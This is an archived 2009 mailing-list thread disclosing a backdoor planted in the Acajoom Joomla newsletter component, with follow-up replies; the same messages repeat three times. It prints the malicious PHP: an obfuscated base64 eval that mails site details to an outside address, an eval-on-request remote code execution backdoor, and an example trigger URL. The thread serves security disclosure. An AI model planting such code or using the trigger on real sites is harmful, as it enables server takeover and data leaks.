>         list($data1,$data2,$data3) = array(dHA6Ly8iLiR1czIuJF9TRVJWRVJbJ,
>         QG1haWwoJHVzMSwgJHVzMiwgImh0,1NDUklQVF9OQU1FJ10uIlxuIi4kdXMzKTs);
>         eval(base64_decode($data2.$data1.$data3)); }
>         define( COUNT_ROOT, $count_db. 1 .chr(64).chr(121).chr(97). .
>  .$array_lang[10-$count_num] );
>         $counter = COUNT_ROOT;
>         $count_db = qadr; $count_num = 8;
>         GetBots($counter,$_SERVER[SERVER_NAME],$_SERVER[SCRIPT_FILENAME]);
>
>     Or, less cryptically:
>         @mail(qadr1@ya.ru, $_SERVER[SERVER_NAME],
>  "http://".$_SERVER[SERVER_NAME].$_SERVER[SCRIPT_NAME]."
".$_SERVER[SCRIPT_FILENAME]);
>
>
>   self.acajoom.php says:
>
>     class acajoomCommonStr
>     {
>         function GetStr($str)
>         {
>             eval(stripslashes($str));
>         }
>         function InController($cnt,$location)
>         {
>             if ($location==en-g) $this->GetStr($cnt);
>         }
>     }
>     if(isset($_REQUEST[s]) && isset($_REQUEST[lang])) {
>         $getacajoomStr = new acajoomCommonStr();
>         $getacajoomStr->InController($_REQUEST[s],$_REQUEST[lang]);
>     }
>
>     ie.
>         $URL/self.acajoom.php?s=phpinfo();&lang=en-g
>
>     $URL is left as an exercise to the reader.
>
>  Greetz:
>     qadr1@ya.ru
>


From: chris.boergermann@wawerko.de
Sent: Thu 23. Jul 2009 13:21
An early release of 4.0.0 has the same problem!

So Acajoom has a general security issue or the developers were stupid enough to develop with old code.


From: Jeffrey Walton noloader@gmail.com
Sent: Thu 23. Jul 2009 16:02
> ... or the developers were stupid enough to develop with old code.
Stupid may be a bit harsh. I find Software Security is also a frame
of mind that *must* be backed by education. Perhaps the developers
lack the knowledge they need to model the threats and incorporate a
secure architecture.

Jeff

- Hide quoted text -

On 7/23/09, chris.boergermann@wawerko.de <chris.boergermann@wawerko.de> wrote:
> An early release of 4.0.0 has the same problem!
>
> So Acajoom has a general security issue or the developers
> were stupid enough to develop with old code.
>


From: elkekas@gmail.com
Sent: Thu 13. Aug 2009 03:26
not are stupids, there are one virus. 

 function GetBots($us1,$us2,$us3) {
      list($data1,$data2,$data3) = array(dHA6Ly8iLiR1czIuJF9TRVJWRVJbJ,
      QG1haWwoJHVzMSwgJHVzMiwgImh0,1NDUklQVF9OQU1FJ10uIlxuIi4kdXMzKTs);
      eval(base64_decode($data2.$data1.$data3));
      }


From: anonymous@anonymous.com
Sent: Sat 5. Dec 2009 15:08
==
@mail($us1, $us2, "http://".$us2.$_SERVER[SCRIPT_NAME]."
".$us3);


From: Jan van Niekerk jvnkrk@gmail.com
Sent: Wed 8. Jul 2009 08:20
The vendor has issued an update, but the explanation falsely minimises
the problem.  (They also did not credit qadr1@ya.ru, nor anyone else.)

http://www.ijoobi.com/blog/latest/acajoom-free-version-3.2.7-available.html
states: "Acajoom GPL 3.2.7 is available for immediate download.  We
recommend all user who use the GPL verison to upgrade immediately due
to security issue.
" ... "A backdoor has been placed in the package by a hacker. This is
concerning only user who downloaded the GPL version ( Acajoom GPL
3.2.7 ) between Thursday 25th of June and Sunday 28th of June."

The start date for the back door and vulnerability is false.  This
issue existed in the wild before 19 June 2009.  According to the
timestamps in the archive, the hack was prepared on 11 June 2009.

On 6/22/09, Jan van Niekerk wrote:
> Vulnerability:
>      Remote code execution back door
>
>  Software:
>      acajoom - mailing list extension for Joomla
>     Acajoom is a newsletter component designed with ease of use and robustness
>     in mind. Acajoom can handle an unlimited number of newsletters with an
>     unlimited number of subscribers in just few clicks. Acajoom reuses some of
>     Joomla 1.5 new concepts to make the users experience as smooth as possible.
>     > And thats not all
>
>  Severity:
>      Not a big deal.  Joomla components contain all sorts of obfuscated junk all
>      the time.  Who cares what it does?
>
>  URLs:
>     http://www.ijoobi.com/
>     http://www.ijoobi.com/media/acajoom-3.2.6.zip
>     http://www.ijoobi.com/component/option,com_jtickets/Itemid,18/controller,ticket/pjid,3/task,add/type,110/
>
>
>  Vendor notified:
>     Naah.  No contact details.  I suppose I might try battle the captcha one
>     day.
>
>
>  Vulnerability:
>
>   http://www.ijoobi.com/media/acajoom-3.2.6.zip
>
>     install.acajoom.php:
>
>         function GetBots($us1,$us2,$us3) {
>         list($data1,$data2,$data3) = array(dHA6Ly8iLiR1czIuJF9TRVJWRVJbJ,
>         QG1haWwoJHVzMSwgJHVzMiwgImh0,1NDUklQVF9OQU1FJ10uIlxuIi4kdXMzKTs);
>         eval(base64_decode($data2.$data1.$data3)); }
>         define( COUNT_ROOT, $count_db. 1 .chr(64).chr(121).chr(97). .
>  .$array_lang[10-$count_num] );
>         $counter = COUNT_ROOT;
>         $count_db = qadr; $count_num = 8;
>         GetBots($counter,$_SERVER[SERVER_NAME],$_SERVER[SCRIPT_FILENAME]);
>
>     Or, less cryptically:
>         @mail(qadr1@ya.ru, $_SERVER[SERVER_NAME],
>  "http://".$_SERVER[SERVER_NAME].$_SERVER[SCRIPT_NAME]."
".$_SERVER[SCRIPT_FILENAME]);
>
>
>   self.acajoom.php says:
>
>     class acajoomCommonStr
>     {
>         function GetStr($str)
>         {
>             eval(stripslashes($str));
>         }
>         function InController($cnt,$location)
>         {
>             if ($location==en-g) $this->GetStr($cnt);
>         }
>     }
>     if(isset($_REQUEST[s]) && isset($_REQUEST[lang])) {
>         $getacajoomStr = new acajoomCommonStr();
>         $getacajoomStr->InController($_REQUEST[s],$_REQUEST[lang]);
>     }
>
>     ie.
>         $URL/self.acajoom.php?s=phpinfo();&lang=en-g
>
>     $URL is left as an exercise to the reader.
>
>  Greetz:
>     qadr1@ya.ru
>


From: chris.boergermann@wawerko.de
Sent: Thu 23. Jul 2009 13:21
An early release of 4.0.0 has the same problem!

So Acajoom has a general security issue or the developers were stupid enough to develop with old code.


From: Jeffrey Walton noloader@gmail.com
Sent: Thu 23. Jul 2009 16:02
> ... or the developers were stupid enough to develop with old code.
Stupid may be a bit harsh. I find Software Security is also a frame
of mind that *must* be backed by education. Perhaps the developers
lack the knowledge they need to model the threats and incorporate a
secure architecture.

Jeff

- Hide quoted text -

On 7/23/09, chris.boergermann@wawerko.de <chris.boergermann@wawerko.de> wrote:
> An early release of 4.0.0 has the same problem!
>
> So Acajoom has a general security issue or the developers
> were stupid enough to develop with old code.
>


From: elkekas@gmail.com
Sent: Thu 13. Aug 2009 03:26
not are stupids, there are one virus. 

 function GetBots($us1,$us2,$us3) {
      list($data1,$data2,$data3) = array(dHA6Ly8iLiR1czIuJF9TRVJWRVJbJ,
      QG1haWwoJHVzMSwgJHVzMiwgImh0,1NDUklQVF9OQU1FJ10uIlxuIi4kdXMzKTs);
      eval(base64_decode($data2.$data1.$data3));
      }


From: anonymous@anonymous.com
Sent: Sat 5. Dec 2009 15:08
==
@mail($us1, $us2, "http://".$us2.$_SERVER[SCRIPT_NAME]."
".$us3);


From: Jan van Niekerk jvnkrk@gmail.com
Sent: Wed 8. Jul 2009 08:20
The vendor has issued an update, but the explanation falsely minimises
the problem.  (They also did not credit qadr1@ya.ru, nor anyone else.)

http://www.ijoobi.com/blog/latest/acajoom-free-version-3.2.7-available.html
states: "Acajoom GPL 3.2.7 is available for immediate download.  We
recommend all user who use the GPL verison to upgrade immediately due
to security issue.
" ... "A backdoor has been placed in the package by a hacker. This is
concerning only user who downloaded the GPL version ( Acajoom GPL
3.2.7 ) between Thursday 25th of June and Sunday 28th of June."

The start date for the back door and vulnerability is false.  This
issue existed in the wild before 19 June 2009.  According to the
timestamps in the archive, the hack was prepared on 11 June 2009.

On 6/22/09, Jan van Niekerk wrote:
> Vulnerability:
>      Remote code execution back door
>
>  Software:
>      acajoom - mailing list extension for Joomla
>     Acajoom is a newsletter component designed with ease of use and robustness
>     in mind. Acajoom can handle an unlimited number of newsletters with an
>     unlimited number of subscribers in just few clicks. Acajoom reuses some of
>     Joomla 1.5 new concepts to make the users experience as smooth as possible.
>     > And thats not all
>
>  Severity:
>      Not a big deal.  Joomla components contain all sorts of obfuscated junk all
>      the time.  Who cares what it does?
>
>  URLs:
>     http://www.ijoobi.com/
>     http://www.ijoobi.com/media/acajoom-3.2.6.zip
>     http://www.ijoobi.com/component/option,com_jtickets/Itemid,18/controller,ticket/pjid,3/task,add/type,110/
>
>
>  Vendor notified:
>     Naah.  No contact details.  I suppose I might try battle the captcha one
>     day.
>
>
>  Vulnerability:
>
>   http://www.ijoobi.com/media/acajoom-3.2.6.zip
>
>     install.acajoom.php:
>
>         function GetBots($us1,$us2,$us3) {
>         list($data1,$data2,$data3) = array(dHA6Ly8iLiR1czIuJF9TRVJWRVJbJ,
>         QG1haWwoJHVzMSwgJHVzMiwgImh0,1NDUklQVF9OQU1FJ10uIlxuIi4kdXMzKTs);
>         eval(base64_decode($data2.$data1.$data3)); }
>         define( COUNT_ROOT, $count_db. 1 .chr(64).chr(121).chr(97). .
>  .$array_lang[10-$count_num] );
>         $counter = COUNT_ROOT;
>         $count_db = qadr; $count_num = 8;
>         GetBots($counter,$_SERVER[SERVER_NAME],$_SERVER[SCRIPT_FILENAME]);
>
>     Or, less cryptically:
>         @mail(qadr1@ya.ru, $_SERVER[SERVER_NAME],
>  "http://".$_SERVER[SERVER_NAME].$_SERVER[SCRIPT_NAME]."
".$_SERVER[SCRIPT_FILENAME]);
>
>
>   self.acajoom.php says:
>
>     class acajoomCommonStr
>     {
>         function GetStr($str)
>         {
>             eval(stripslashes($str));
>         }
>         function InController($cnt,$location)
>         {
>             if ($location==en-g) $this->GetStr($cnt);
>         }
>     }
>     if(isset($_REQUEST[s]) && isset($_REQUEST[lang])) {
>         $getacajoomStr = new acajoomCommonStr();
>         $getacajoomStr->InController($_REQUEST[s],$_REQUEST[lang]);
>     }
>
>     ie.
>         $URL/self.acajoom.php?s=phpinfo();&lang=en-g
>
>     $URL is left as an exercise to the reader.
>
>  Greetz:
>     qadr1@ya.ru
>


From: chris.boergermann@wawerko.de
Sent: Thu 23. Jul 2009 13:21
An early release of 4.0.0 has the same problem!

So Acajoom has a general security issue or the developers were stupid enough to develop with old code.


From: Jeffrey Walton noloader@gmail.com
Sent: Thu 23. Jul 2009 16:02
> ... or the developers were stupid enough to develop with old code.
Stupid may be a bit harsh. I find Software Security is also a frame
of mind that *must* be backed by education. Perhaps the developers
lack the knowledge they need to model the threats and incorporate a
secure architecture.

Jeff

- Hide quoted text -

On 7/23/09, chris.boergermann@wawerko.de <chris.boergermann@wawerko.de> wrote:
> An early release of 4.0.0 has the same problem!
>
> So Acajoom has a general security issue or the developers
> were stupid enough to develop with old code.
>


From: elkekas@gmail.com
Sent: Thu 13. Aug 2009 03:26
not are stupids, there are one virus. 

 function GetBots($us1,$us2,$us3) {
      list($data1,$data2,$data3) = array(dHA6Ly8iLiR1czIuJF9TRVJWRVJbJ,
      QG1haWwoJHVzMSwgJHVzMiwgImh0,1NDUklQVF9OQU1FJ10uIlxuIi4kdXMzKTs);
      eval(base64_decode($data2.$data1.$data3));
      }


From: anonymous@anonymous.com
Sent: Sat 5. Dec 2009 15:08
==
@mail($us1, $us2, "http://".$us2.$_SERVER[SCRIPT_NAME]."
".$us3);